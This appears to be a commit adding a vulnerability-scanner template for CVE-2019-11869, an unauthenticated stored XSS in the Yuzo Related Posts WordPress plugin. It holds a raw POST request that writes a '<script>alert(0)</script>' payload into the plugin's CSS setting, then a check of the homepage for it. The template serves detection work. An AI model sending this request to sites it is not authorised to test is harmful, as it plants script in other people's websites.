Add CVE-2019-11869

XSS in Yuzo Related Posts plugin before 5.12.94

cves/CVE-2019-11869.yaml

@@ -0,0 +1,44 @@
+id: cve-2019-11869
+
+info:
+  name: Yuzo Related Posts plugin XSS
+  author: ganofins
+  severity: medium
+  description: |
+    The Yuzo Related Posts plugin before 5.12.94 for WordPress has XSS
+    because it mistakenly expects that is_admin() verifies that the
+    request comes from an admin user (it actually only verifies that the
+    request is for an admin page). An unauthenticated attacker can inject
+    a payload into the plugin settings, such as the
+    yuzo_related_post_css_and_style setting.
+
+    References:
+    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
+    - https://wpscan.com/vulnerability/9254
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Content-Type: application/x-www-form-urlencoded
+
+        yuzo_related_post_css_and_style=</style><script>alert(0);</script>
+        
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Upgrade-Insecure-Requests: 1
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "alert(0)"
+          - "<script>alert(0);</script>"
+        part: body